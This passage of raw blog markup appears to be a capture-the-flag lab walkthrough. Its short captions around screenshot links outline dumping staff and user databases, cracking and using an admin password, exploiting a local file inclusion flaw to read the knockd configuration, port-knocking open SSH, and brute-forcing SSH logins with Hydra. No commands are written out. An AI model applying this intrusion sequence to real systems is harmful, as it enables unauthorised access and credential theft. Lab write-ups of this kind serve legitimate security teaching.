href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ifYc2jiwsQdfckvU512KK_qw1Wx_jgVXuMvs-M1TI6fnJ6Eex56GW8aCqsAa4VCjIt_gEZ4qg8Vb1z1UC5BraURQa6RfHA4WlvKXXgRByAg4m_y7yrp2Um4zTMkQfID7f7hDBmwYNP-U/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;423&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ifYc2jiwsQdfckvU512KK_qw1Wx_jgVXuMvs-M1TI6fnJ6Eex56GW8aCqsAa4VCjIt_gEZ4qg8Vb1z1UC5BraURQa6RfHA4WlvKXXgRByAg4m_y7yrp2Um4zTMkQfID7f7hDBmwYNP-U/s16000/screenshot.3.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for databases we find &lt;b&gt;Staff&lt;/b&gt; and &lt;b&gt;users&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTyerRhs2mDUldKxOdFVsWdg-hWEo1ZRiYewjJPPXHg0nSOSYxtLHBMPg2xdSvUiZpAekCFxgS4QKE4XoQtfIMcebvtMiZUCTntyQx9Z-rfHyZdRu5vsv-tUwFxaoVIwD-RE0qpY7YlG2T/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTyerRhs2mDUldKxOdFVsWdg-hWEo1ZRiYewjJPPXHg0nSOSYxtLHBMPg2xdSvUiZpAekCFxgS4QKE4XoQtfIMcebvtMiZUCTntyQx9Z-rfHyZdRu5vsv-tUwFxaoVIwD-RE0qpY7YlG2T/s16000/screenshot.4.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0FpQLNvqldEFb96EjOhBSqs80lrywLAwAvWtDo0xRDZbIvx5V79ixUfuRGgDgk0LnFeeI7Ghmi0OjwSgVWety0ZywmXrKLcAG8umnlcohA6EY4YSohz0vTYfQvwwXMLmLHoO07_hMw1Tn/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;124&quot; data-original-width=&quot;459&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0FpQLNvqldEFb96EjOhBSqs80lrywLAwAvWtDo0xRDZbIvx5V79ixUfuRGgDgk0LnFeeI7Ghmi0OjwSgVWety0ZywmXrKLcAG8umnlcohA6EY4YSohz0vTYfQvwwXMLmLHoO07_hMw1Tn/s16000/screenshot.5.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dumping all from &lt;b&gt;Staff &lt;/b&gt;we find passwords and usernames:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzA_dgx2iZsm5B1Hi3uYMoUgtnxThMDjqAAcZCdVJfqP5mP52DQlpkkcWdPNuDPgpMhd9b2dxfXid7LL1XYpTneETcst7BvJRqHJsIB0XvYlSW1QPk4jqZGn9tTT2tMgCN7ZyO_QPZYW8/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;54&quot; data-original-width=&quot;546&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzA_dgx2iZsm5B1Hi3uYMoUgtnxThMDjqAAcZCdVJfqP5mP52DQlpkkcWdPNuDPgpMhd9b2dxfXid7LL1XYpTneETcst7BvJRqHJsIB0XvYlSW1QPk4jqZGn9tTT2tMgCN7ZyO_QPZYW8/s16000/screenshot.6.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBycKZwWfIJETCHVXGhebqHczf-he0co9eycYScwweG2yHYVyJFbEVeKMHI0mmcNH9FtOuWwSzDIFIxY74v1_UouH-46QMwU-fOEXntabpKlAZxUc-HofLlBtOhBh0uGAO9oda2hqN4QL3/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;190&quot; data-original-width=&quot;653&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBycKZwWfIJETCHVXGhebqHczf-he0co9eycYScwweG2yHYVyJFbEVeKMHI0mmcNH9FtOuWwSzDIFIxY74v1_UouH-46QMwU-fOEXntabpKlAZxUc-HofLlBtOhBh0uGAO9oda2hqN4QL3/s16000/screenshot.8.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1kg94z-CpvRDTqz-pjMxJwcOffNOWmhyphenhyphenoVOlcPi_Hopdm4L0xJuEs3HYZ49nAgIlBhpLlMeBBYe7mq80VCPMTwFdGGX27UwOw9LvCx0Uc7fmxaNQaOtd1hIqmQkKSpeWYcKqe_vj5JND2/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;555&quot; data-original-width=&quot;1426&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1kg94z-CpvRDTqz-pjMxJwcOffNOWmhyphenhyphenoVOlcPi_Hopdm4L0xJuEs3HYZ49nAgIlBhpLlMeBBYe7mq80VCPMTwFdGGX27UwOw9LvCx0Uc7fmxaNQaOtd1hIqmQkKSpeWYcKqe_vj5JND2/s16000/screenshot.7.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Same thing with database &lt;b&gt;users&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJK-U8ZIUuTI9nyfQmWnFIhz92-mkTmzildtQFqcykEff57bR0DHlGPocjlHmdWCQjyf3-JW_OCyEiP_-rEawD5OJMPrh8IpijlQad52272mTILGYNEZc_u6sV-q55jQiT6zteMAxa7Eda/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;56&quot; data-original-width=&quot;559&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJK-U8ZIUuTI9nyfQmWnFIhz92-mkTmzildtQFqcykEff57bR0DHlGPocjlHmdWCQjyf3-JW_OCyEiP_-rEawD5OJMPrh8IpijlQad52272mTILGYNEZc_u6sV-q55jQiT6zteMAxa7Eda/s16000/screenshot.10.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHf3sAR3AeBE7n8WAhmG0JIcinfFptwMnp8Tq6v1d_Ecrc7LzljEUsjJfcVlfV_KfQF-lWKO_vE3vUokP_w7piX-qRVSKzYizPxiVSVcD5Wcz6A1rl5udDfkuvIeKnKF_fz6sG-m7Hym6w/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;554&quot; data-original-width=&quot;923&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHf3sAR3AeBE7n8WAhmG0JIcinfFptwMnp8Tq6v1d_Ecrc7LzljEUsjJfcVlfV_KfQF-lWKO_vE3vUokP_w7piX-qRVSKzYizPxiVSVcD5Wcz6A1rl5udDfkuvIeKnKF_fz6sG-m7Hym6w/s16000/screenshot.11.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Decrypting &lt;b&gt;admin&lt;/b&gt;&#39;s password:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir3EHCtsg3YGjZnj4e2YPUM_QuSOPPjdAPf2Gy1j2eX8yK4Y2iOKkwkuxW7-Pr2MYYW6NkzgnD91BBNHgMtvYyN_U8aO5LU3WUdYqb11TZ9idkBbc8iHXl6ZDB_W4GH3VgEgtkPWWXdfO_/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;659&quot; data-original-width=&quot;926&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir3EHCtsg3YGjZnj4e2YPUM_QuSOPPjdAPf2Gy1j2eX8yK4Y2iOKkwkuxW7-Pr2MYYW6NkzgnD91BBNHgMtvYyN_U8aO5LU3WUdYqb11TZ9idkBbc8iHXl6ZDB_W4GH3VgEgtkPWWXdfO_/s16000/screenshot.9.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Logging with &lt;b&gt;admin:transorbital1&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOAGSpy6qP6vz64EfBqLYQWtLp-gJmWo-c8VnOBoqRW6RxLeeXEtwNLidQAr44MPMY_6nJjs7D8VE0K7WG1NqjRl2FJfZO2Fc8qFxM04yXMgVYZHOgWieZ8aSWT5lmNvhqsdo0DwV0EsVS/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;603&quot; data-original-width=&quot;812&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOAGSpy6qP6vz64EfBqLYQWtLp-gJmWo-c8VnOBoqRW6RxLeeXEtwNLidQAr44MPMY_6nJjs7D8VE0K7WG1NqjRl2FJfZO2Fc8qFxM04yXMgVYZHOgWieZ8aSWT5lmNvhqsdo0DwV0EsVS/s16000/screenshot.12.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5QfTQ1Hi0UeYCymKTMt25Lp_lsuRHbP7dFVABMby2cUolOsfLlPEnJ2TcW8dnwglSR1Y9uhdQ-fAF4oHPo0sXiD1NrFydiGdnu7zuwSylvNA6cHIqqz0Kd15IGHOHsmwR0R_IqpQXEhlS/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;394&quot; data-original-width=&quot;677&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5QfTQ1Hi0UeYCymKTMt25Lp_lsuRHbP7dFVABMby2cUolOsfLlPEnJ2TcW8dnwglSR1Y9uhdQ-fAF4oHPo0sXiD1NrFydiGdnu7zuwSylvNA6cHIqqz0Kd15IGHOHsmwR0R_IqpQXEhlS/s16000/screenshot.13.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The footer message &lt;b&gt;File does not exist &lt;/b&gt;suggest that function&lt;b&gt; include &lt;/b&gt;is being used, so maybe there&amp;nbsp;is a &lt;b&gt;LFI vulnerability:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgW4qWJBcLzJxklQmKtalaxaT3TaaDOEXTCw51Rt164cZl0Xio0EcTLnb9IUCsRimS61k2QuTj8W_XFnpAU1jIV_uo1ba_pgpNjCyvggcRHxdSH-Xi7ZJ3S3HLy9ozhgT4po7yr9LZpo7w/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;872&quot; data-original-width=&quot;1117&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgW4qWJBcLzJxklQmKtalaxaT3TaaDOEXTCw51Rt164cZl0Xio0EcTLnb9IUCsRimS61k2QuTj8W_XFnpAU1jIV_uo1ba_pgpNjCyvggcRHxdSH-Xi7ZJ3S3HLy9ozhgT4po7yr9LZpo7w/s16000/screenshot.14.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Remembering that SSH service is filtered (see Nmap oputput) and going around some configuration files we find &lt;b&gt;/etc/knockd.conf&lt;/b&gt;, what contains an SSH number sequence:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs_iZDs_ABDDDzsMltGjcGeStPUuH8Qb-fUzAcv1qPUXcbkG1TSNoQP-3YZH8W3EQyLpUmQdqYVPBpmL8svMW5gPEh5o1IHBHt3wuSmTLPzxqpErDhYj60TUESXcZ4AYRo-3hxtS-UjjoH/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;561&quot; data-original-width=&quot;1126&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs_iZDs_ABDDDzsMltGjcGeStPUuH8Qb-fUzAcv1qPUXcbkG1TSNoQP-3YZH8W3EQyLpUmQdqYVPBpmL8svMW5gPEh5o1IHBHt3wuSmTLPzxqpErDhYj60TUESXcZ4AYRo-3hxtS-UjjoH/s16000/screenshot.16.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Using &lt;b&gt;knock&lt;/b&gt; command to unblock access to SSH service:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz3tjwr9GxO5exd1ybxdgBL7ecjc1BZJ7u4gaEFgqLbzF8xB8hndu37EmHXG93Nu8aRt7yo5vaBrlsVG0RcMl390K71TBSvIPImd2knBeFWkvcJXrpK-_g19lpAw1X2Urbv3gQSiCeVsRS/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;245&quot; data-original-width=&quot;435&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz3tjwr9GxO5exd1ybxdgBL7ecjc1BZJ7u4gaEFgqLbzF8xB8hndu37EmHXG93Nu8aRt7yo5vaBrlsVG0RcMl390K71TBSvIPImd2knBeFWkvcJXrpK-_g19lpAw1X2Urbv3gQSiCeVsRS/s16000/screenshot.17.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;Hydra&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; helps finding SSH accounts:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSjfHdbaigsfmLBDELvZK1SLA7M1P6G6YN_0zgpkjmLa8owK17JsVN4vtLvS-OZAdztVq_Ysg3Fmf1QzVDRcfSFAU8pX47PjY7Ok_5qbfuUybBZJLHxP94hie_lL8hywXH6Q-jQh-jJlpS/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;462&quot; data-original-width=&quot;280&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSjfHdbaigsfmLBDELvZK1SLA7M1P6G6YN_0zgpkjmLa8owK17JsVN4vtLvS-OZAdztVq_Ysg3Fmf1QzVDRcfSFAU8pX47PjY7Ok_5qbfuUybBZJLHxP94hie_lL8hywXH6Q-jQh-jJlpS/s16000/screenshot.18.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOHXaSCPwTaGJ95FbC6foZpP2lQ2WvgViYD6FU628BqTuYeJ5RfnUEOGo58CrVtFHV_C1L_DZ5af2AkueLHWDb_LhATEEfUqMOPpo6AkCo0g8al0_oZw8wGZY_Aegmh7wvWnTgnmFdIppR/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;457&quot; data-original-width=&quot;262&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOHXaSCPwTaGJ95FbC6foZpP2lQ2WvgViYD6FU628BqTuYeJ5RfnUEOGo58CrVtFHV_C1L_DZ5af2AkueLHWDb_LhATEEfUqMOPpo6AkCo0g8al0_oZw8wGZY_Aegmh7wvWnTgnmFdIppR/s16000/screenshot.19.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1e3zoT3BIkB_ItOrlUD3Rm1p8Ud8P6vccXjchi1G8L3AJOGVIcqd9OrS9FaBtbX0MX1T3PDvwnL_COT8tZ_A2_AGlfyuFor1qMW7_i_JvRy7-ZGVWMU9SIVi1-y0Rq70NZp2Yf-00LQU-/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;403&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1e3zoT3BIkB_ItOrlUD3Rm1p8Ud8P6vccXjchi1G8L3AJOGVIcqd9OrS9FaBtbX0MX1T3PDvwnL_COT8tZ_A2_AGlfyuFor1qMW7_i_JvRy7-ZGVWMU9SIVi1-y0Rq70NZp2Yf-00LQU-/s16000/screenshot.20.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a 